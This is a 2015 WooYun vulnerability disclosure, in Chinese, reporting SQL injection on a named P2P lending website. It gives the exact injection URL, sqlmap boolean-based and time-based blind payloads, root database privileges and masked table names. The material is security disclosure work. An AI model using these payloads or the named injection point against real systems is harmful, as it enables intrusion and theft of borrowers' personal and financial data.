当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125255

漏洞标题:p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)

相关厂商:紫枫信贷

漏洞作者: DloveJ

提交时间:2015-07-08 11:08

修复时间:2015-08-22 11:10

公开时间:2015-08-22 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

p2p金融安全之紫枫信贷root权限注入(用户信息岌岌可危)

详细说明:

1.jpg


注入点:http://www.zfxindai.cn/event/index/id/1.html


sqlmap

Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.zfxindai.cn:80/event/index/id/1) AND 9275=9275 AND (8214
=8214.html
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.zfxindai.cn:80/event/index/id/1) AND SLEEP(5) AND (5803=
5803.html
---


current user:    'root@%'


2.jpg


database management system users privileges:
[*] %root% (administrator) [26]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] %ucloudbackup% (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE


mask 区域 
***** zfxi*****
*****tab*****
*****-------*****
*****       *****
*****log    *****
*****       *****
*****       *****
*****       *****
*****e      *****
*****d_rule *****
*****k      *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****book   *****
*****oans   *****
*****efund  *****
*****isk    *****
*****       *****
*****       *****
*****ion    *****
*****ion_log*****
*****ons    *****
*****achment*****
*****ribute *****
*****h_exten*****
*****h_group*****
*****h_group*****
*****h_rule *****
*****tar    *****
*****egory  *****
*****nnel   *****
*****ck_info*****
*****fig    *****
*****trict  *****
*****field  *****
*****ument  *****
*****ument_a*****
*****ument_d*****
*****nt     *****
*****nt_atte*****
*****nt_type*****
*****ld     *****
*****ld_grou*****
*****ld_sett*****
*****e      *****
*****low    *****
*****um     *****
*****um_book*****
*****um_lzl_*****
*****um_post*****
*****um_post*****
*****ks     *****
*****ue     *****
*****ue_cont*****
*****al_comm*****
*****ber    *****
*****u      *****
*****sage   *****
*****el     *****
*****ture   *****
*****nt_log *****
*****k      *****
*****k_user *****
*****_rule  *****
*****p      *****
*****p_addre*****
*****p_buy  *****
*****p_categ*****
*****p_confi*****
*****p_log  *****
*****p_see  *****
*****port   *****
*****c_login*****
*****k      *****
*****k_messa*****
*****k_messa*****
*****k_push *****
*****nyi_ver*****
*****nter_ad*****
*****nter_me*****
*****nter_se*****
*****       *****
*****r_token*****
*****e      *****
*****e_recor*****
*****bo     *****
*****bo_comm*****
*****bo_top *****
*****info   *****
*****       *****
*****pply   *****
*****       *****
*****comment*****
*****member *****
*****       *****
*****       *****
*****g      *****
*****       *****
*****       *****
*****g      *****
*****       *****
*****       *****
*****efund  *****
*****tar    *****
*****       *****
*****       *****
*****ert    *****
*****st     *****
*****       *****
*****       *****
*****       *****
*****s      *****
*****ce     *****
*****       *****
*****       *****
*****       *****
*****eport  *****
*****oup    *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****pay    *****
*****ay     *****
*****       *****
*****       *****
*****ail    *****
*****       *****
*****-------*****


4.jpg


163个表,我就不跑了。展示一部分表

mask 区域 
*****isk    *****
*****       *****
*****       *****
*****ion    *****
*****ion_log*****
*****ons    *****
*****achment*****
*****ribute *****
*****h_exten*****
*****h_group*****
*****h_group*****
*****h_rule *****
*****tar    *****
*****egory  *****
*****nnel   *****
*****ck_info*****
*****fig    *****
*****trict  *****
*****field  *****
*****ument  *****
*****ument_a*****
*****ument_d*****
*****nt     *****
*****nt_atte*****
*****nt_type*****
*****ld     *****
*****ld_grou*****
*****ld_sett*****
*****e      *****
*****low    *****
*****um     *****
*****um_book*****
*****um_lzl_*****
*****um_post*****
*****um_post*****
*****ks     *****
*****ue     *****
*****ue_cont*****
*****al_comm*****
*****ber    *****
*****u      *****
*****sage   *****
*****el     *****
*****ture   *****
*****nt_log *****
*****k      *****
*****k_user *****
*****_rule  *****
*****p      *****
*****p_addre*****
*****p_buy  *****
*****p_categ*****
*****p_confi*****
*****p_log  *****
*****p_see  *****
*****port   *****
*****c_login*****
*****k      *****
*****k_messa*****
*****k_messa*****
*****k_push *****
*****nyi_ver*****
*****nter_ad*****
*****nter_me*****
*****nter_se*****
*****       *****
*****r_token*****
*****e      *****
*****e_recor*****
*****bo     *****
*****bo_comm*****
*****bo_top *****
*****info   *****
*****       *****
*****pply   *****
*****       *****
*****comment*****
*****member *****
*****       *****
*****       *****
*****g      *****
*****       *****
*****       *****
*****g      *****
*****       *****
*****       *****
*****efund  *****
*****tar    *****
*****       *****
*****       *****
*****ert    *****
*****st     *****
*****       *****
*****       *****
*****       *****
*****s      *****
*****ce     *****
*****       *****
*****       *****
*****       *****
*****eport  *****
*****oup    *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****       *****
*****pay    *****
*****ay     *****
*****       *****
*****       *****
*****ail    *****
*****       *****
*****-------*****


随便看一下其中的内容

mask 区域 
*****lub_me*****
*****lum*****
*****---------*****
*****         *****
*****---------*****
*****         *****
*****10) unsig*****
*****(16)     *****
*****(10)     *****
*****umint(8) *****
*****int(3) un*****
*****10) unsig*****
*****--------*****


非法的是我不敢,拒绝查水表

漏洞证明:

给高rank就可以不。

修复方案:

版权声明:转载请注明来源 DloveJ@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论

  1. 2015-07-08 13:53 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    小伙子

  2. 2015-07-12 23:30 | 博远山人 ( 路人 | Rank:0 漏洞数:1 | 白帽子一枚)

    紫枫信贷不仅仅是注入的问题